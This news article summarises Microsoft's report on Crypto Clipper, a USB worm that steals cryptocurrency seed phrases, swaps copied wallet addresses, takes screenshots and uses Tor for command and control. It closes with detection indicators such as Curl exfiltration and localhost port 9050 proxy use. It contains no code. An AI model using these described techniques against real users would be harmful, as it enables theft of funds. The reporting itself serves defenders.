Microsoft warns of USB worm targeting cryptocurrency wallets
Microsoft says Crypto Clipper spreads through USB drives, steals wallet data and can reroute payments to attacker-controlled addresses.
By James Whitfield · Staff Writer
3 min read
Microsoft has detected a new USB-spreading malware strain aimed at stealing cryptocurrency credentials and redirecting payments. The company said the malware, which it calls Crypto Clipper, combines clipboard theft, screenshots and Tor-routed communications in a small tool that can also give attackers continued access to compromised devices.
In a security report published Thursday, Microsoft said Crypto Clipper watches a device clipboard for text that resembles cryptocurrency wallet addresses or seed phrases. Seed phrases are the 12- or 24-word recovery strings used to regain access to many crypto wallets.
When the malware finds those patterns, Microsoft said, it sends the captured data to infrastructure controlled by the attacker. It also takes five screenshots over 10 seconds and uploads them, which Microsoft said may help attackers understand the context around the stolen information.
How the malware spreads
Microsoft said it observed Crypto Clipper moving through Windows shortcut files, known as .lnk files, on USB drives. When an infected drive is connected to a device, the code checks whether the malware is already present; if not, it downloads the malware through a Tor connection, according to Microsoft.
The company said the worm also tries to reduce obvious signs of infection on the removable drive. Microsoft said it scans the USB device and gives the shortcut files names that resemble other files on the drive.
Crypto Clipper routes stolen data through Tor using a local SOCKS5 proxy, according to Microsoft. Tor is designed to obscure the path between sender and receiver by moving traffic through multiple nodes, while SOCKS5 can pass traffic through a proxy before it reaches its destination.
Microsoft said that design makes the malware notable because it does not rely on a standard installer or exposed command-and-control servers tied to visible IP addresses. The company described the result as a financially motivated stealer that also functions as a lightweight backdoor.
Wallet theft and redirection
Beyond stealing seed phrases, Crypto Clipper can alter cryptocurrency addresses copied to the clipboard, Microsoft said. If a user copies a legitimate wallet address before sending funds, the malware can replace it with an address controlled by the attacker.
That gives the attacker two paths to profit, according to Microsoft: stealing wallet recovery information and diverting transactions before they are sent. Microsoft said the malware’s remote code execution capability also gives attackers a way to run additional commands after infection.
Microsoft said the threat shows how script-based stealers can have a broad effect when paired with anonymized communications and live tasking. The company pointed to Tor-routed command-and-control traffic, clipboard monitoring, screenshots and remote execution as the key parts of the operation.
Detection signs
Microsoft said Defender for Endpoint flags Crypto Clipper activity as suspicious JavaScript processes and possible data exfiltration using Curl. Microsoft Defender Antivirus detects it as Trojan:Win32/CryptoBandits.A, according to the company.
Microsoft listed several broader warning signs for defenders, including script interpreters launching unusual child processes, proxy use on localhost port 9050, PowerShell commands that capture screens, and evidence of clipboard inspection or cryptocurrency address substitution.
The company’s report on Crypto Clipper is available on the Microsoft Security Blog.
This story draws on original reporting from Ars Technica.